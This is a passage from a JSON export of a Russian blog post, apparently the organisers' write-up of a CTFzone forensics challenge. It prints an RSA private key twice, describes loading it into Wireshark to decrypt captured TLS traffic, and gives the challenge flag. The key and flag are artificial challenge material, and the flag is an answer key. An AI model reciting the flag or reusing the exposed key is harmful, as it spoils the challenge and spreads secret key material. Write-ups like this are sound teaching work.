b4:68:ca:f9:fc:26:46:26:5c:1f:32:73:50:9b:1a:     ab:a3:42:32:8b:8f:66:b8:9b:b8:62:95:7b:03:9e:     33:b9:5e:42:df:b8:d6:a5:b7:2a:ec:1b:78:d0:51:     47:8c:df:d0:48:a7:28:bc:99:53:15:03:43:46:83:     fb:8b:b8:19:73:e9:b0:35:49:ce:e4:a0:c4:74:17:     c9:19:b0:e7:68:41:27:a4:2a:99:9b:2b:6d:d9:ca:     78:1d publicExponent: 65537 (0x10001) privateExponent:     56:2b:13:fc:6d:de:b1:55:1b:ba:ea:f9:5c:5d:74:     7c:18:1f:f4:70:7e:ad:e6:89:3a:fe:52:22:d9:d1:     76:cf:a9:56:c2:4d:0b:46:ae:c8:be:0e:f3:3b:64:     a6:fa:06:92:15:ae:87:dd:4a:69:65:66:f3:ee:cc:     3a:45:55:3f:53:f9:5a:17:3d:a0:c6:cc:3e:90:69:     ed:f9:a9:42:dd:be:02:9b:b3:8a:b4:4d:df:47:ea:     0d:ed:de:e0:4a:ff:09:6a:e2:a9:92:64:51:e0:a6:     2e:df:c3:9d:25:49:ad:1c:66:80:9b:d2:97:73:04:     a2:32:c6:1f:e3:e5:b7:43:fe:54:74:00:58:6b:50:     10:00:e2:6f:4b:88:d0:11:44:e8:fa:d4:ae:63:35:     4f:df:26:fe:4a:40:5a:3e:b4:81:a3:cb:45:67:46:     a7:46:b9:98:94:71:63:61:e1:61:e7:e0:c1:40:0c:     78:d8:d7:5a:87:af:6f:f8:af:91:bb:dd:9c:51:ec:     2f:a3:c4:fb:cc:76:39:88:03:d2:53:87:78:45:15:     c4:c7:9f:93:6b:29:cb:40:c9:8f:97:ff:43:dc:8e:     48:fa:36:22:06:78:bb:cd:83:e9:75:89:8a:50:ff:     22:32:71:72:b1:d3:51:97:13:d0:a1:0e:f4:c6:58:     e5 prime1:     00:fb:1c:cf:52:34:81:ec:db:cc:7a:b1:62:70:15:     e0:2d:de:35:21:60:12:29:da:5f:b4:25:21:33:0f:     8a:14:33:f7:ee:03:59:9e:5c:d1:e5:5f:86:18:59:     05:b4:67:29:49:a8:74:da:94:f1:ff:25:96:61:a8:     18:67:c9:d7:01:f8:51:ba:12:f0:41:1a:03:44:21:     e8:3d:2c:6b:9e:06:0b:9f:0d:b3:aa:24:72:7b:87:     c8:86:94:bd:1e:36:c7:03:03:5b:81:df:81:ac:00:     ea:18:d5:b7:f0:3a:ab:48:aa:81:a1:4f:b0:77:d1:     01:c6:c9:f3:d9:1e:93:7c:0f prime2:     00:d0:2d:33:dc:0f:e4:5c:5e:0f:97:54:bc:6a:61:     8e:43:64:da:64:25:4a:aa:0c:14:6b:f4:da:a1:62:     2e:84:1b:1a:0e:73:9e:c6:59:4f:9d:87:2d:54:22:     f8:86:c5:3d:f3:33:9f:b3:4b:bf:9f:d9:52:a2:e3:     8a:ad:a7:0d:1b:6d:5e:ed:c5:dd:da:3b:12:d5:e5:     62:1c:42:f9:7a:0e:a5:d6:51:db:31:a8:19:c8:85:     05:7b:4e:1d:68:09:5c:9f:9d:74:1f:46:4f:33:6b:     ec:1d:0a:aa:68:dd:2c:77:aa:8d:9d:44:5d:ca:cb:     af:7a:e8:34:05:5a:3c:8d:13 exponent1:     49:66:f9:7f:49:13:f5:7d:a6:7e:f2:dd:18:70:7c:     90:4b:d4:f2:05:98:29:9d:c8:bd:ea:e0:92:81:67:     56:52:7e:95:97:6b:19:ec:7d:fa:73:7a:ca:21:33:     96:b1:55:13:4f:e7:a0:81:4b:5f:ce:c7:ef:91:e8:     58:66:5a:b0:1b:bb:20:0e:2b:26:8c:89:09:e0:73:     77:76:45:9a:f2:9f:71:05:db:4f:cf:c9:9b:2c:6c:     c4:52:34:19:e1:df:38:95:41:a9:6c:01:06:9b:59:     d2:9a:9e:62:dd:73:76:11:49:45:32:fb:1d:7a:fd:     ee:f2:d7:91:ce:eb:43:a7 exponent2:     00:a3:95:d1:b9:ac:b7:4b:2a:12:e0:5d:12:ce:19:     a8:fc:26:85:42:ca:d7:18:36:f3:d9:3d:88:8b:e6:     a6:1c:e3:5b:1f:5e:15:b7:51:b9:31:55:66:f6:45:     a0:bb:ee:c4:d6:96:8b:79:0e:1e:1f:93:5b:cf:6a:     34:b0:6e:a3:eb:18:8f:cf:12:7c:5a:1f:af:96:6b:     71:24:3a:30:e6:8c:1a:1f:07:25:d2:a8:80:d2:44:     4d:61:6e:a9:c6:f6:0c:55:d5:19:c9:f5:ab:09:02:     56:81:1f:bf:77:35:cd:da:9f:28:37:1b:e1:04:19:     f8:e4:01:11:d7:de:e7:d4:07 coefficient:     1c:e6:21:67:a7:de:0e:64:c5:b1:4b:15:37:d2:d2:     2b:ad:c0:2a:c9:c5:6d:61:13:75:99:a9:c2:5b:6e:     b5:cc:ad:25:62:ad:d4:58:92:c4:6c:cd:94:7d:a9:     d4:65:f3:48:91:7d:aa:d7:73:57:b8:0e:a0:68:e5:     a5:4a:48:96:1e:25:90:ff:fb:94:88:8e:2d:4d:69:     b5:55:7e:c1:d9:60:2d:e1:bc:a1:01:27:f6:82:e0:     64:a9:6b:62:4b:95:1a:67:a9:78:28:be:dd:b5:b6:     dd:9b:67:ae:13:0f:51:3a:77:c3:f5:d8:0a:22:44:     68:ea:04:b1:85:79:ed:38 writing RSA key -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAzDO\/YdXDBs1PSSU5gdE5Mb44hye2mKhkza88D3ol3do28\/QT RNwTEF1hg9l0AHgYVASiV\/Uiiz2lIMIGxHb3JbI6zO9hmIe3QNUPzh61FrKvYoAL BPzw+OEj+u0wKk2MWRG\/Cgj1rlguk44DzcMF5n0YKR9KTGvmPXEhuqW7b4D9WGtU E4nT6oJF63qUxttEOre+jgkKZXs3BpVe+oLUF91jN+O0aMr5\/CZGJlwfMnNQmxqr o0Iyi49muJu4YpV7A54zuV5C37jWpbcq7Bt40FFHjN\/QSKcovJlTFQNDRoP7i7gZ c+mwNUnO5KDEdBfJGbDnaEEnpCqZmytt2cp4HQIDAQABAoIBAFYrE\/xt3rFVG7rq +VxddHwYH\/Rwfq3miTr+UiLZ0XbPqVbCTQtGrsi+DvM7ZKb6BpIVrofdSmllZvPu zDpFVT9T+VoXPaDGzD6Qae35qULdvgKbs4q0Td9H6g3t3uBK\/wlq4qmSZFHgpi7f w50lSa0cZoCb0pdzBKIyxh\/j5bdD\/lR0AFhrUBAA4m9LiNARROj61K5jNU\/fJv5K QFo+tIGjy0VnRqdGuZiUcWNh4WHn4MFADHjY11qHr2\/4r5G73ZxR7C+jxPvMdjmI A9JTh3hFFcTHn5NrKctAyY+X\/0Pcjkj6NiIGeLvNg+l1iYpQ\/yIycXKx01GXE9Ch DvTGWOUCgYEA+xzPUjSB7NvMerFicBXgLd41IWASKdpftCUhMw+KFDP37gNZnlzR 5V+GGFkFtGcpSah02pTx\/yWWYagYZ8nXAfhRuhLwQRoDRCHoPSxrngYLnw2zqiRy e4fIhpS9HjbHAwNbgd+BrADqGNW38DqrSKqBoU+wd9EBxsnz2R6TfA8CgYEA0C0z 3A\/kXF4Pl1S8amGOQ2TaZCVKqgwUa\/TaoWIuhBsaDnOexllPnYctVCL4hsU98zOf s0u\/n9lSouOKracNG21e7cXd2jsS1eViHEL5eg6l1lHbMagZyIUFe04daAlcn510 H0ZPM2vsHQqqaN0sd6qNnURdysuveug0BVo8jRMCgYBJZvl\/SRP1faZ+8t0YcHyQ S9TyBZgpnci96uCSgWdWUn6Vl2sZ7H36c3rKITOWsVUTT+eggUtfzsfvkehYZlqw G7sgDismjIkJ4HN3dkWa8p9xBdtPz8mbLGzEUjQZ4d84lUGpbAEGm1nSmp5i3XN2 EUlFMvsdev3u8teRzutDpwKBgQCjldG5rLdLKhLgXRLOGaj8JoVCytcYNvPZPYiL 5qYc41sfXhW3UbkxVWb2RaC77sTWlot5Dh4fk1vPajSwbqPrGI\/PEnxaH6+Wa3Ek OjDmjBofByXSqIDSRE1hbqnG9gxV1RnJ9asJAlaBH793Nc3anyg3G+EEGfjkARHX 3ufUBwKBgBzmIWen3g5kxbFLFTfS0iutwCrJxW1hE3WZqcJbbrXMrSVirdRYksRs zZR9qdRl80iRfarXc1e4DqBo5aVKSJYeJZD\/+5SIji1NabVVfsHZYC3hvKEBJ\/aC 4GSpa2JLlRpnqXgovt21tt2bZ64TD1E6d8P12AoiRGjqBLGFee04 -----END RSA PRIVATE KEY----- <\/code><\/pre>\n<p>  <\/div>\n<\/div>\n<p>  \u041d\u0430\u043c \u043d\u0443\u0436\u0435\u043d \u0442\u043e\u043b\u044c\u043a\u043e \u043a\u043b\u044e\u0447:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAzDO\/YdXDBs1PSSU5gdE5Mb44hye2mKhkza88D3ol3do28\/QT RNwTEF1hg9l0AHgYVASiV\/Uiiz2lIMIGxHb3JbI6zO9hmIe3QNUPzh61FrKvYoAL BPzw+OEj+u0wKk2MWRG\/Cgj1rlguk44DzcMF5n0YKR9KTGvmPXEhuqW7b4D9WGtU E4nT6oJF63qUxttEOre+jgkKZXs3BpVe+oLUF91jN+O0aMr5\/CZGJlwfMnNQmxqr o0Iyi49muJu4YpV7A54zuV5C37jWpbcq7Bt40FFHjN\/QSKcovJlTFQNDRoP7i7gZ c+mwNUnO5KDEdBfJGbDnaEEnpCqZmytt2cp4HQIDAQABAoIBAFYrE\/xt3rFVG7rq +VxddHwYH\/Rwfq3miTr+UiLZ0XbPqVbCTQtGrsi+DvM7ZKb6BpIVrofdSmllZvPu zDpFVT9T+VoXPaDGzD6Qae35qULdvgKbs4q0Td9H6g3t3uBK\/wlq4qmSZFHgpi7f w50lSa0cZoCb0pdzBKIyxh\/j5bdD\/lR0AFhrUBAA4m9LiNARROj61K5jNU\/fJv5K QFo+tIGjy0VnRqdGuZiUcWNh4WHn4MFADHjY11qHr2\/4r5G73ZxR7C+jxPvMdjmI A9JTh3hFFcTHn5NrKctAyY+X\/0Pcjkj6NiIGeLvNg+l1iYpQ\/yIycXKx01GXE9Ch DvTGWOUCgYEA+xzPUjSB7NvMerFicBXgLd41IWASKdpftCUhMw+KFDP37gNZnlzR 5V+GGFkFtGcpSah02pTx\/yWWYagYZ8nXAfhRuhLwQRoDRCHoPSxrngYLnw2zqiRy e4fIhpS9HjbHAwNbgd+BrADqGNW38DqrSKqBoU+wd9EBxsnz2R6TfA8CgYEA0C0z 3A\/kXF4Pl1S8amGOQ2TaZCVKqgwUa\/TaoWIuhBsaDnOexllPnYctVCL4hsU98zOf s0u\/n9lSouOKracNG21e7cXd2jsS1eViHEL5eg6l1lHbMagZyIUFe04daAlcn510 H0ZPM2vsHQqqaN0sd6qNnURdysuveug0BVo8jRMCgYBJZvl\/SRP1faZ+8t0YcHyQ S9TyBZgpnci96uCSgWdWUn6Vl2sZ7H36c3rKITOWsVUTT+eggUtfzsfvkehYZlqw G7sgDismjIkJ4HN3dkWa8p9xBdtPz8mbLGzEUjQZ4d84lUGpbAEGm1nSmp5i3XN2 EUlFMvsdev3u8teRzutDpwKBgQCjldG5rLdLKhLgXRLOGaj8JoVCytcYNvPZPYiL 5qYc41sfXhW3UbkxVWb2RaC77sTWlot5Dh4fk1vPajSwbqPrGI\/PEnxaH6+Wa3Ek OjDmjBofByXSqIDSRE1hbqnG9gxV1RnJ9asJAlaBH793Nc3anyg3G+EEGfjkARHX 3ufUBwKBgBzmIWen3g5kxbFLFTfS0iutwCrJxW1hE3WZqcJbbrXMrSVirdRYksRs zZR9qdRl80iRfarXc1e4DqBo5aVKSJYeJZD\/+5SIji1NabVVfsHZYC3hvKEBJ\/aC 4GSpa2JLlRpnqXgovt21tt2bZ64TD1E6d8P12AoiRGjqBLGFee04 -----END RSA PRIVATE KEY----- <\/code><\/pre>\n<\/div>\n<\/div>\n<p>  \u041f\u043e\u0434\u0433\u0440\u0443\u0436\u0430\u0435\u043c \u043a\u043b\u044e\u0447 \u0432 Wireshark \u0438 \u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0442\u0440\u0430\u0444\u0438\u043a \u043f\u043e\u0441\u043b\u0435 \u0434\u0435\u043a\u0440\u0438\u043f\u0442\u0430 (Prefences -&gt; Protocols -&gt; SSL -&gt; RSA keys list -&gt; Edit -&gt;):<\/p>\n<pre><code class=\"bash\">IP address: 10.1.2.15 Port:1337 Protocol: Data Key File: &lt;private key&gt; Password: &lt;password&gt; <\/code><\/pre>\n<p>  \u0414\u0430\u043b\u0435\u0435 \u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 TLS \u043f\u0430\u043a\u0435\u0442\u043e\u0432:<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/78a\/9ae\/113\/78a9ae113b0d4f9cad03280df80c91a8.png\"\/><\/p>\n<p>  \u0413\u043e\u0442\u043e\u0432\u043e!<\/p>\n<p>  <b>\u041e\u0442\u0432\u0435\u0442:<\/b> <i>ctfzone{ControlIsAnI11us10n}<\/i><\/p>\n<p>  \u0412\u043e\u0442 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c 1950 \u0431\u0430\u043b\u043b\u043e\u0432 \u0437\u0430 \u0444\u043e\u0440\u0435\u043d\u0437\u0438\u043a\u0443. \u0415\u0441\u043b\u0438 \u0432\u0430\u043c \u0447\u0442\u043e-\u0442\u043e \u043d\u0435\u043f\u043e\u043d\u044f\u0442\u043d\u043e \u2013 \u0437\u0430\u0434\u0430\u0432\u0430\u0439\u0442\u0435 \u0432\u043e\u043f\u0440\u043e\u0441\u044b \u0432 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u044f\u0445 \u0438\u043b\u0438 \u0432 <a href=\"https:\/\/telegram.me\/joinchat\/Aj-l2UC2XdOvF_ogMsQE0w\">\u0442\u0435\u043b\u0435\u0433\u0440\u0430\u043c<\/a>, \u043c\u044b \u043d\u0430 \u0441\u0432\u044f\u0437\u0438 \u0434\u043d\u0435\u043c \u0438 \u043d\u043e\u0447\u044c\u044e!<\/p>\n<p>  \u0420\u0430\u0439\u0442\u0430\u043f\u044b \u043f\u043e \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u043c \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c \u0442\u0430\u043a\u0436\u0435 \u0441\u043a\u043e\u0440\u043e \u043f\u043e\u044f\u0432\u044f\u0442\u0441\u044f \u0432 \u043d\u0430\u0448\u0435\u043c \u0431\u043b\u043e\u0433\u0435, \u0442\u0430\u043a \u0447\u0442\u043e \u0441\u043b\u0435\u0434\u0438\u0442\u0435 \u0437\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438. \u0410 \u043f\u043e\u043a\u0430 \u043c\u043e\u0436\u0435\u0442\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u043d\u043e\u0432\u044b\u0435 \u0437\u043d\u0430\u043d\u0438\u044f \u043f\u043e <a href=\"https:\/\/tasks.bi.zone\">\u0441\u0441\u044b\u043b\u043a\u0435<\/a> \u2013 \u0442\u0430\u043c \u043a\u0430\u043a \u0440\u0430\u0437 \u043c\u043d\u043e\u0433\u043e \u0444\u043e\u0440\u0435\u043d\u0437\u0438\u043a\u0438 \ud83d\ude09<br \/> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habrahabr.ru\/post\/315954\/\"> https:\/\/habrahabr.ru\/post\/315954\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/4cb\/e22\/f87\/4cbe22f87a914e519e22fcf96b1b3a01.jpg\"\/><\/p>\n<p>  \u041f\u0440\u043e\u0448\u043b\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043d\u0435\u0439 \u043f\u043e\u0441\u043b\u0435 \u043e\u043a\u043e\u043d\u0447\u0430\u043d\u0438\u044f CTFzone \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 BI.ZONE, \u0430 \u043d\u0430\u0448\u0438 \u0441\u043c\u0430\u0440\u0442\u0444\u043e\u043d\u044b \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0440\u0430\u0437\u0440\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u043e\u0442 \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0438\u0439 Telegram \u2013 \u0447\u0430\u0442 \u0441 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430\u043c\u0438 \u0431\u0438\u0442\u0432\u044b \u043f\u043e\u0441\u043b\u0435 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 \u0441\u0442\u0430\u043b \u0435\u0449\u0435 \u0431\u043e\u043b\u0435\u0435 \u043e\u0436\u0438\u0432\u043b\u0435\u043d\u043d\u044b\u043c. \u041f\u043e \u043e\u0442\u0437\u044b\u0432\u0430\u043c \u0438\u0433\u0440\u043e\u043a\u043e\u0432, \u043c\u043d\u043e\u0433\u0438\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f CTFzone \u0431\u044b\u043b\u0438 \u043e\u0447\u0435\u043d\u044c \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u043c\u0438 \u0438 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u0435\u043f\u0440\u043e\u0441\u0442\u044b\u043c\u0438. \u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0441\u043e\u0440\u0435\u0432\u043d\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u044b \u043f\u043e\u043e\u0431\u0435\u0449\u0430\u043b\u0438 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430\u043c, \u0447\u0442\u043e, \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430\u0448\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043e\u0442\u043e\u0441\u043f\u044f\u0442\u0441\u044f \u0438 \u043f\u0440\u0438\u0434\u0443\u0442 \u0432 \u0441\u0435\u0431\u044f, \u043c\u044b \u0432\u044b\u043b\u043e\u0436\u0438\u043c \u0440\u0430\u0439\u0442\u0430\u043f\u044b \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0437\u0430\u0434\u0430\u043d\u0438\u0439 \u0432 \u043d\u0430\u0448\u0435\u043c \u0431\u043b\u043e\u0433\u0435. <\/p>\n<p>  \u041d\u0430\u0447\u043d\u0435\u043c \u043c\u044b \u0441 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Forensics, \u0438 \u0432 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c \u0432\u0430\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043d\u0430 \u0432\u0441\u0435 \u0442\u0430\u0441\u043a\u0438 \u2013 \u043e\u0442 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u043d\u0430 50 \u0434\u043e 1000. \u041c\u044b \u0437\u043d\u0430\u0435\u043c, \u0447\u0442\u043e <a href=\"https:\/\/habrahabr.ru\/users\/hackzard\/\" class=\"user_link\">hackzard<\/a> \u043e\u043f\u0435\u0440\u0435\u0434\u0438\u043b \u043d\u0430\u0441 \u0438 \u0443\u0436\u0435 \u0432\u044b\u043b\u043e\u0436\u0438\u043b \u0440\u0430\u0439\u0442\u0430\u043f\u044b \u043a \u0437\u0430\u0434\u0430\u043d\u0438\u044f\u043c \u043d\u0430 50 \u0438 100, \u043d\u043e \u0441 \u0431\u043e\u043b\u0435\u0435 \u043a\u0440\u0443\u0442\u044b\u043c\u0438 \u0442\u0430\u0441\u043a\u0430\u043c\u0438 \u0431\u0443\u0434\u0435\u0442 \u0441\u043b\u043e\u0436\u043d\u0435\u0435 \ud83d\ude09<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-281495","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/281495","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=281495"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/281495\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=281495"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=281495"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=281495"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}